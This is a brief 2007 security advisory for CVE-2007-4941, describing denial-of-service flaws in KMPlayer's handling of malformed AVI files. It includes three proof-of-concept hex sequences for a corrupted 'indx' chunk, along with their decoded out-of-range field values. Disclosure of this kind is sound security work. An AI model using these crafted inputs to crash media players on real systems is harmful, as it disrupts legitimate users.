KMPlayer - Multiple Remote Denial of Service Vulnerabilities

Related Vulnerabilities: CVE-2007-4941  
Publish Date: 12 Sep 2007

KMPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed AVI media files.

Successfully exploiting this issue allows remote attackers to deny service to legitimate users.

These issues affect KMPlayer; other versions may also be vulnerable. 

69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10

indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF

indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF

69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10

indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020